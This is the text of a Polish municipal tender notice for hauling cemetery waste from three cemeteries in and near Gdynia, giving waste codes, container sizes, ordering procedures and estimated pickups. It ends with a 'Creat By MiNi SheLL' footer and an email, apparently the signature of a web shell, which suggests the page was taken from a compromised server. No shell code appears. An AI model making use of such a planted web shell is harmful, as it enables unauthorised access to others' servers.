Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-7 (7m3) , KP-8 (8 m3) i KP-9 m3, otwarte, odbiór hakowy.

1.3. Dodatkowe kontenery:

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsca wskazane przez Zamawiającego 2 kontenerów o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 5 dodatkowych kontenerów o pojemności 7 m3, 8 m3 lub 9 m3, 

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2015 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 7 m3, 8 m3 lub 9 m3.

Zasady realizacji usługi wywozu odpadów z terenu cmentarzy komunalnych administrowanych przez Zarząd Cmentarzy Komunalnych w Gdyni (wspólne dla wszystkich części):

1)  w ramach usługi Wykonawca zobowiązany będzie do wywozu napełnionych kontenerów z cmentarzy, utylizacji odpadów zgodnie z obowiązującymi przepisami i ponownego ich ustawienia na terenie cmentarza.
2)   usługi, z zastrzeżeniem o którym mowa w pkt. 4, świadczone będą każdorazowo na zlecenie Zamawiającego. Zlecenia składane będą drogą telefoniczną w godzinach 700-1500 od   poniedziałku do soboty. W przypadku braku możliwości złożenia zlecenia drogą telefoniczną (np. awaria linii, brak połączenia), zlecenia składane będą za pomocą poczty elektronicznej (e-mail) lub faksem. Wykonawca zobowiązany będzie do niezwłocznego potwierdzenia odebrania zlecenia drogą elektroniczną lub faksem.
3)  wykonanie usługi, z zastrzeżeniem o którym mowa w pkt. 4, winno się odbyć najpóźniej w ciągu następnego dnia roboczego (tj. od poniedziałku do soboty) po dniu zgłoszenia w godz. 700-1500.
4)  w dniach znacznego zwiększenia liczby osób odwiedzających cmentarze tj. 15.10-03.11.2015 r., Wykonawca zobowiązany będzie do:
4.1.bieżącego wywozu zapełnionych kontenerów, bez konieczności zachowania trybu określonego w pkt 2 i 3,
4.2.wskazania osoby, której zadaniem będzie bezpośredni nadzór nad realizacją usługi   w ścisłej współpracy z Zamawiającym do czasu zakończenia wywozu w powyższym okresie.
5) każdorazowy wywóz winien być odnotowany w rejestrze wywozów prowadzonym przez Zamawiającego i poświadczony przez Wykonawcę.
6)   Wykonawca winien zabezpieczyć tabor niezbędny do realizacji zamówienia.
7)  Wykonawca zobowiązany będzie przez cały okres obowiązywania umowy i wykonywania zamówienia do dysponowania stałą dostępną dla Zamawiającego łącznością telefoniczną (co najmniej 2 numery telefoniczne), faksem oraz pocztą elektroniczną do przyjmowania zleceń na usługi. Poczta elektroniczna musi być obsługiwana w programie pozwalającym na potwierdzenie odbioru otrzymanej wiadomości.

Prognozowana ilość wywozu kontenerów w okresie trwania zamówienia. Szacuje się, że w okresie wykonywania zamówienia Wykonawca dokona wywozu kontenerów w następujących ilościach:

-kontener 7 m3 - 180 wywozów,
-kontener 8 m3 - 250 wywozów,
-kontener 9 m3 -  70 wywozów,
-kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 100 wywozów.

UWAGA! Podane powyżej ilości wywozów oszacowane zostały na podstawie danych z poprzednich okresów i mogą ulec zmianie w zależności od zapotrzebowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Spokojnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Spokojnej

1. Rodzaj i kod odpadów: 
-	pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-	ziemia i kamienie z wykopów pod groby (kod odpadu: 17 05 04 - gleba i ziemia, w tym kamienie inne niż wymienione w 17 05 03),
-	gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

2. Wielkość i rodzaj kontenerów 

Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-8 (8 m3), otwarte, odbiór hakowy.

3. Dodatkowe kontenery:

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsce wskazane przez Zamawiającego 1 kontenera o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01) albo ziemi i kamieni z wykopów pod groby inne niż wymienione w 17 05 03 (kod odpadu: 17 05 04),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 8 m3,

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2015 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 2 dodatkowych kontenerów o pojemności 8 m3.


Zasady realizacji usługi wywozu odpadów z terenu cmentarzy komunalnych administrowanych przez Zarząd Cmentarzy Komunalnych w Gdyni:

1)  w ramach usługi Wykonawca zobowiązany będzie do wywozu napełnionych kontenerów z cmentarzy, utylizacji odpadów zgodnie z obowiązującymi przepisami i ponownego ich ustawienia na terenie cmentarza.
2)   usługi, z zastrzeżeniem o którym mowa w pkt. 4, świadczone będą każdorazowo na zlecenie Zamawiającego. Zlecenia składane będą drogą telefoniczną w godzinach 700-1500 od   poniedziałku do soboty. W przypadku braku możliwości złożenia zlecenia drogą telefoniczną (np. awaria linii, brak połączenia), zlecenia składane będą za pomocą poczty elektronicznej (e-mail) lub faksem. Wykonawca zobowiązany będzie do niezwłocznego potwierdzenia odebrania zlecenia drogą elektroniczną lub faksem.
3)  wykonanie usługi, z zastrzeżeniem o którym mowa w pkt. 4, winno się odbyć najpóźniej w ciągu następnego dnia roboczego (tj. od poniedziałku do soboty) po dniu zgłoszenia w godz. 700-1500.
4)  w dniach znacznego zwiększenia liczby osób odwiedzających cmentarze tj. 15.10-03.11.2015 r., Wykonawca zobowiązany będzie do:
4.1.bieżącego wywozu zapełnionych kontenerów, bez konieczności zachowania trybu określonego w pkt 2 i 3,
4.2.wskazania osoby, której zadaniem będzie bezpośredni nadzór nad realizacją usługi   w ścisłej współpracy z Zamawiającym do czasu zakończenia wywozu w powyższym okresie.
5) każdorazowy wywóz winien być odnotowany w rejestrze wywozów prowadzonym przez Zamawiającego i poświadczony przez Wykonawcę.
6)   Wykonawca winien zabezpieczyć tabor niezbędny do realizacji zamówienia.
7)  Wykonawca zobowiązany będzie przez cały okres obowiązywania umowy i wykonywania zamówienia do dysponowania stałą dostępną dla Zamawiającego łącznością telefoniczną (co najmniej 2 numery telefoniczne), faksem oraz pocztą elektroniczną do przyjmowania zleceń na usługi. Poczta elektroniczna musi być obsługiwana w programie pozwalającym na potwierdzenie odbioru otrzymanej wiadomości.

Prognozowana ilość wywozu kontenerów w okresie trwania zamówienia. Szacuje się, że w okresie wykonywania zamówienia  Wykonawca dokona wywozu kontenerów w następujących ilościach:

-kontener 8 m3 - 130 wywozów,
-kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 15 wywozów,
-kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu ziemi i kamieni) -  5 wywozów

UWAGA! Podane powyżej ilości wywozów oszacowane zostały na podstawie danych z poprzednich okresów i mogą ulec zmianie w zależności od zapotrzebowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wywóz odpadów z terenu cmentarza komunalnego położonego w Kosakowie przy ulicy Rzemieślniczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wywóz odpadów z terenu cmentarza komunalnego położonego w Kosakowie przy ulicy Rzemieślniczej

1. Rodzaj i kod odpadów 
-pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-ziemia i kamienie z wykopów pod groby (kod odpadu: 17 05 04 - gleba i ziemia, w tym kamienie inne niż wymienione w 17 05 03),
-gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

2. Wielkość i rodzaj kontenerów 

Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-7 (7 m3) i KP-8 (8 m3), otwarte, odbiór hakowy.

3. Dodatkowe kontenery

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsce wskazane przez Zamawiającego 1 kontenera o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01) albo ziemi i kamieni z wykopów pod groby inne niż wymienione w 17 05 03 (kod odpadu 17 05 04),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 7 m3 lub 8 m3,

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2014 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejscu wskazanym przez Zamawiającego 1 dodatkowego kontenera o pojemności 7 m3 lub 8 m3.

Zasady realizacji usługi wywozu odpadów z terenu cmentarzy komunalnych administrowanych przez Zarząd Cmentarzy Komunalnych w Gdyni:

1)  w ramach usługi Wykonawca zobowiązany będzie do wywozu napełnionych kontenerów z cmentarzy, utylizacji odpadów zgodnie z obowiązującymi przepisami i ponownego ich ustawienia na terenie cmentarza.
2)   usługi, z zastrzeżeniem o którym mowa w pkt. 4, świadczone będą każdorazowo na zlecenie Zamawiającego. Zlecenia składane będą drogą telefoniczną w godzinach 700-1500 od   poniedziałku do soboty. W przypadku braku możliwości złożenia zlecenia drogą telefoniczną (np. awaria linii, brak połączenia), zlecenia składane będą za pomocą poczty elektronicznej (e-mail) lub faksem. Wykonawca zobowiązany będzie do niezwłocznego potwierdzenia odebrania zlecenia drogą elektroniczną lub faksem.
3)  wykonanie usługi, z zastrzeżeniem o którym mowa w pkt. 4, winno się odbyć najpóźniej w ciągu następnego dnia roboczego tj. od poniedziałku do soboty po dniu zgłoszenia w godz. 700-1500.
4)  w dniach znacznego zwiększenia liczby osób odwiedzających cmentarze tj. 15.10-03.11.2015 r., Wykonawca zobowiązany będzie do:
4.1.bieżącego wywozu zapełnionych kontenerów, bez konieczności zachowania trybu określonego w pkt 2 i 3,
4.2.wskazania osoby, której zadaniem będzie bezpośredni nadzór nad realizacją usługi w ścisłej współpracy z Zamawiającym do czasu zakończenia wywozu w powyższym okresie.
5) każdorazowy wywóz winien być odnotowany w rejestrze wywozów prowadzonym przez Zamawiającego i poświadczony przez Wykonawcę.
6)   Wykonawca winien zabezpieczyć tabor niezbędny do realizacji zamówienia.
7)  Wykonawca zobowiązany będzie przez cały okres obowiązywania umowy i wykonywania zamówienia do dysponowania stałą dostępną dla Zamawiającego łącznością telefoniczną (co najmniej 2 numery telefoniczne), faksem oraz pocztą elektroniczną do przyjmowania zleceń na usługi. Poczta elektroniczna musi być obsługiwana w programie pozwalającym na potwierdzenie odbioru otrzymanej wiadomości.

Prognozowana ilość wywozu kontenerów w okresie trwania zamówienia. Szacuje się, że w okresie wykonywania zamówienia Wykonawca dokona wywozu kontenerów w następujących ilościach:

- kontener 7 m3 - 30 wywozów,
- kontener 8 m3 - 140 wywozów,
- kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 5 wywozów,
- kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu ziemi i kamieni) -  15 wywozów.

UWAGA Podane powyżej ilości wywozów oszacowane zostały na podstawie danych z poprzednich okresów i mogą ulec zmianie w zależności od zapotrzebowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com